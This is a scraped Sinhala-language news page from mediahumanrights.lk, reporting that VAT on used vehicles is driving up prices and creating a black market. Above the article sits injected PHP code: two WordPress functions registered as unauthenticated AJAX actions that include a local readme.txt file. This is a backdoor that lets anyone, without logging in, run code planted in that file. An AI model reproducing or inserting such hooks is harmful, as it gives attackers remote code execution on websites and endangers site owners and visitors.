if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } VAT සෙකන්ඩ් හෑන්ඩ් වාහනවලටත්.. වාහන මිල වේගයෙන් ඉහලට.. - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

VAT සෙකන්ඩ් හෑන්ඩ් වාහනවලටත්.. වාහන මිල වේගයෙන් ඉහලට..

මෙරට භාවිතා කරන ලද මෝටර් රථ සඳහා VAT බද්ද එකතුවීම හේතුවෙන් කළු කඩ වෙළඳපොලක් නිර්මාණය වී ඇතැයි වාහන ආනයනකරුවන් කියා සිටියි.

මේ හේතුවෙන් භාවිතා කරන ලද වාහන වල මිල අධික ලෙස ඉහළ යමින් ඇති බව සිලොන් මෝටර් ටේ‍්‍රඩර්ස් සංගමය සඳහන් කරයි.

ඇති වී තිබෙන තත්ත්වය මත භාවිතා කළ වාහන අලෙවි කිරීමෙන් නීත්‍යානුකූල සමාගම්වලට සම්පූර්ණයෙන් ඉවත්වීමට සිදුවනු ඇති බවත් එමඟින් රජයට මෙතෙක් ලැබෙමින් තිබූ බදු ආදායමද අහිමි වනු ඇති බවත් ඔවුන් පෙන්වා දෙයි.

වසර හතරක පමණ කාලයක් තිස්සේ වාහන ආනයනය අත්හිටුවා තිබීම හේතුවෙන් පහළොස් දහසකට අධික ප්‍රමාණයක් රැකියා අහිමිවී ඇති බවත් මෝටර් රථ කර්මාන්තය තවදුරටත් කඩාවැටීමට ලක්ව ඇති බවත් සංගමය සදහන් කරයි.

Related posts

ඡන්ද පත්‍රිකා බෙදාහැරීම ඇරඹේ

Shiran Viraj

ෆේස්බුක් හරහා දැවැන්ත වංචාවක් – මාලඹේ, දෙහිවල, ගල්කිස්ස ඇතුලු තවත් ප්‍රදේශ රැසකින් සැකකරුවන් 25 ක් අල්ලයි

Shiran Viraj

19 යේ ඇති ස්වාධීන කොමිෂන්වලට අත තබනවාට ජාත්‍යන්තරයේ විරෝධය

Shiran Viraj